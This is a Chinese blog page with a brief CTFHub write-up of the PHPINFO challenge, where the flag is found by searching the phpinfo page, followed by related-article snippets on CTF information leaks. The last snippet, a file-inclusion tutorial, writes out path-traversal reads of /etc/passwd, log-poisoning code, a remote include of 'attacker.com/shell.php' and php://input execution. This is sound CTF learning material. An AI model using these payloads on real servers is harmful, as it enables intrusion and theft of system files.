CTFHub技能树——信息泄露——PHPINFO

最新推荐文章于 2025-05-28 11:20:41 发布

原创最新推荐文章于 2025-05-28 11:20:41 发布 · 272 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#网络安全 #数据结构

本文指导读者如何在phpinfo页面中搜索隐藏的flag，通过Ctrl+F快速定位关键信息，适合寻找技术挑战的入门者。

打开环境看题目

如下

没有其他的操作，点击“点击查看phpinfo”。

得到了一个很长很长的页面，根据提示flag就藏在其中，怎么办呢？

不要慌，直接ctrl+f打开查找栏，搜索“flag”，就找到了。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

21046221Wrl

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

一、CTF-Web-信息泄露（记录CTF学习）

qq_27920699的博客

12-16

3466

个人CTF学习之路

CTFhub-web-信息泄露（超详细、新手推荐）

test_zpx的博客

08-13

792

目录遍历是web中常见的基础操作，我们通常会通过目录的遍历来发现是否存在对我们有用的信息。

参与评论您还未登录，请先登录后发表或查看评论

CTFHub:web前置技能-信息泄露-PHPINFO篇

wdnmddbl的博客

06-06

645

路漫漫其修远兮，吾将上下而求索。本文涉及以下知识点，去引用文章学习即可：链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点phpinfo() 是php中查看相关信息的函数，当在页面中执行phpinfo()函数时，php会将自身的所有信息全部打印出来。在phpinfo中会泄露很多服务端的一些信息例如安装的一些模块、网站绝对路径、服务器自身的操作系统、使用的组件版本等等，在phpinfo中获得的这些信息会为下一步的渗透/做题提供一些帮助。

CTF赛题PHP7 正则绕过

kelenwait的博客

08-19

2846

题目为ctf web中php正则绕过题前言：由于长度限制，且不像其他题目告知flag.php的内容，笔者并没有求出flag，绕过思路可参考，也欢迎ctf大佬指点迷津。题目如下，解析flag.php中的flag变量 <?php include("flag.php"); if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>20){ die("Too Long."); }

Spring Boot框架敏感信息泄露的完整介绍与SRC实战(附专属字典与PoC)

qq_50854662的博客

10-04

8761

转载于：https://www.freebuf.com/vuls/289710.html #前言##Spring Boot框架介绍Spring框架功能很强大，但是就算是一个很简单的项目，我们也要配置很多东西。因此就有了Spring Boot框架，它的作用很简单，就是帮我们自动配置，其设计目的是用来简化新Spring应用的初始搭建以及开发过程。Spring Boot框架的核心就是自动配置，只要存在相应的jar包，Spring就帮我们自动配置。该框架使用了特定的方式来进行配置，从而使开发人员不再需要定义样板化的

2、ctfhub技能树_web_信息泄露

YanLucyqi的博客

05-28

2055

注：PHPInfo函数信息泄露漏洞常发生一些默认的安装包，比如phpstudy等，默认安装完成后，没有及时删除这些提供环境测试的文件，比较常见的为phpinfo.php、1.php和test.php，然后通过phpinfo获取的php环境以及变量等信息，但这些信息的泄露配合一些其它漏洞将有可能导致系统被渗透和提权。漏洞原理是因为没有过滤用户输入的…（5）输入ls-a查看生成的文件，然后再输入cd .hg进入文件，输入grep -r flag*得到flag存放的路径为flag_3257718.txt。

CTFHub 技能树-Web-信息泄露

qq_65379983的博客

02-25

1808

CTF:Web-信息泄露

CTFHub技能树--信息泄露通关攻略

2302_77611368的博客

02-25

477

依次点击寻找flag文件即可flag文件入上图所示，点开复制提交即可。

CTFHub技能树web-信息泄露篇

2301_79848048的博客

11-30

898

获取到文件后打开CTRL+H把空格全部替换为空字符,即可获取到txt文件名,直接访问即可获取flag。去浏览器访问flag_562825338.txt即可获取flag。下载好后打开index.php.bak文件即可获取flag。CTRL+F搜索ctfhub,就能找到flag了。切换到目录直接查看txt文件即可获取flag。查看.svn-base文件即可获取flag。打开flag.txt就能看到flag了。下载好访问txt文件即可获取flag。切换到.hg目录下搜索flag*输入命令,即可获取flag。

CTFHub技能树 Web-信息泄露 详解

weixin_45808483的博客

11-11

7767

目录遍历开始查找进入到了/flag_in_here文件树中，依次遍历寻找： PHPINFO 点击查看phpinfo 浏览phpinfo.php，搜索flag 备份文件下载——网站源码当开发人员在线上环境中对源代码进行了备份操作，并且将备份文件放在了 web 目录下，就会引起网站源码泄露。查看提示：我们可以根据文件名和后缀进行查找：这使用python脚本进行扫描 import requests if __name__ == '...

CTFHub | PHPINFO

尼泊罗河伯的博客

10-03

2420

因为这题没有过多的提示，只是说明了 phpinfo ，点击查看页面发现 phpinfo 测试页面。原以为这题是一道大题，需要利用信息泄露找到跳转页面什么的。测试了好久都是 not found ，最后在接近网页末尾才发现一个名称为 ctfhub ，这才发现了此题 flag 居然隐藏在测试页面中。

ctf练习之试下phpinfo吧

SDM_JH的博客

08-10

1247

一、进入目标站点，查看网页源码，大概率是一个文件包含的漏洞。二、测试lang参数，在lang=…/phpinfo.php时，成功回显信息，在该文件中ctrl+f查找flag，发现flag。

渗透测试练习No.18 利用phpinfo+LFI(文件包含漏洞)打进主机

hljzzj的博客

01-23

7206

phpinfo文件上传+LFI(文件包含)获取shell,suid提权

ctfPHPINFO

plant1234的博客

03-30

341

PHPINFO: 根据题目启动环境得到：点击查看在环境配置中找到flag:

web渗透测试----10、信息泄露

七天

02-25

5339

文章目录一、phpinfo()信息泄露1、操作系统版本（system）2、php扩展的路径（extension_dir）3、web根目录4、绝对路径5、支持的程序6、泄露真实IP7、敏感配置8、gopher9、fastcgi二、js敏感信息泄露1、JS文件泄露后台管理敏感路径及API2、页面内JS泄露http-only保护的cookie3、页面内JS以及AJAX请求泄露用户敏感信息三、Web源码泄露1、git源码泄露2、svn源码泄露3、hg源码泄漏4、CVS泄露5、Bazaar/bzr泄露6、网站备份压缩

信息泄露（ctfhub）

2401_82985722的博客

04-03

1311

当开发人员在线上环境中使用 vim 编辑器，在使用过程中会留下 vim 编辑器缓存，当vim异常退出时，缓存会一直留在服务器上，引起网站源码泄露。在使用vim时会创建临时缓存文件，关闭vim时缓存文件则会被删除，当vim异常退出后，因为未处理缓存文件，导致可以通过缓存文件恢复原始文件内容。整理一下思路，题目说的就是flag在index.php.bak文件里，访问路径下载文件，得到flag。使用dirsearch扫描，找到200的可以访问路径，下载url/.index.php.swp。

【Flag】-PHP-正则绕过

soldi_er的博客

09-02

2664

文章目录【RCTF2020】calc通用字符集合正则字符替换[a-z]落脚函数参考最近RCTF分站赛要开始了，梳理一些知识。【RCTF2020】calc 主要check源码如下 $str = $_GET['num']; $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', "`", '\[', "\]","\$", '_', "\\\\",'\^', ","]; foreach ($blacklist as $blackitem) {

CTFHub-PHPINFO

m0_69003772的博客

04-23

1335

PHPINFO解题过程

[NPUCTF2020]ReadlezPHP 此题有两个flag哦

Eason_LYC安全白帽子的成长博客

08-04

1235

[NPUCTF2020]ReadlezPHP，其实有两个flag哦

ctfhub技能树文件包含

最新发布

08-21

在CTF比赛中，文件包含是一种常见的漏洞类型，通常涉及到本地文件包含（LFI）和远程文件包含（RFI）。解题的关键在于理解Web应用如何处理文件包含请求，并利用这些漏洞获取敏感信息或执行恶意代码。 ### 本地文件包含（LFI） LFI漏洞允许攻击者通过构造特定的请求来读取服务器上的任意本地文件。这种漏洞通常出现在动态包含文件时，没有正确过滤用户输入。 #### 解题技巧 - **路径遍历**：利用`../`来访问父目录，尝试读取敏感文件，如`/etc/passwd`。例如，如果应用包含文件的方式是`include($_GET['page'] . ".php")`，可以通过构造请求`?page=../../etc/passwd`来读取密码文件[^3]。 - **日志文件注入**：攻击者可以通过向服务器日志文件中注入PHP代码，然后利用LFI漏洞包含并执行这些日志文件。常见的日志文件位置包括`/var/log/apache/access.log`或`/var/log/apache/error.log`。例如，发送一个带有PHP代码的HTTP请求，如`GET /<?php phpinfo(); ?> HTTP/1.1`，然后通过LFI包含日志文件`?page=../../var/log/apache/access.log`来执行代码。 - **临时文件利用**：上传文件时，PHP会将上传的文件存储在一个临时目录中，默认情况下这个文件名是随机生成的。可以通过包含临时文件来执行上传的PHP代码。例如，上传一个包含PHP代码的文件，然后利用`/tmp/phpXXXXXX`这样的路径来包含并执行代码。 ### 远程文件包含（RFI） RFI漏洞允许攻击者从远程服务器上包含文件，这通常是因为应用允许包含外部URL。RFI可以导致远程代码执行（RCE）。 #### 解题技巧 - **直接包含远程文件**：如果应用允许包含远程文件，可以直接上传一个PHP shell到攻击者的服务器，然后通过构造请求来包含并执行这个shell。例如，构造请求`?page=http://attacker.com/shell.php`，其中`shell.php`包含恶意代码[^3]。 - **利用PHP伪协议**：PHP提供了一些伪协议，如`php://input`和`php://filter`，可以用于读取输入流或过滤数据。例如，使用`php://input`来读取POST请求中的数据并执行，构造请求`?page=php://input`并在POST中发送PHP代码。 - **编码绕过**：有时服务器会对输入进行过滤，可以通过编码绕过这些限制。例如，使用URL编码或Base64编码来绕过简单的过滤机制，然后在包含文件时解码执行[^3]。 ### 示例代码以下是一个简单的PHP代码示例，展示了如何利用LFI漏洞读取`/etc/passwd`文件： ```php <?php $page = $_GET['page']; include($page . ".php"); ?> ``` 通过构造请求`?page=../../etc/passwd`，可以绕过文件扩展名的限制，直接读取`/etc/passwd`文件的内容。 ```python # 示例Python代码，用于发送HTTP请求 import requests url = "http://example.com/vulnerable_page.php" params = {"page": "../../etc/passwd"} response = requests.get(url, params=params) print(response.text) ```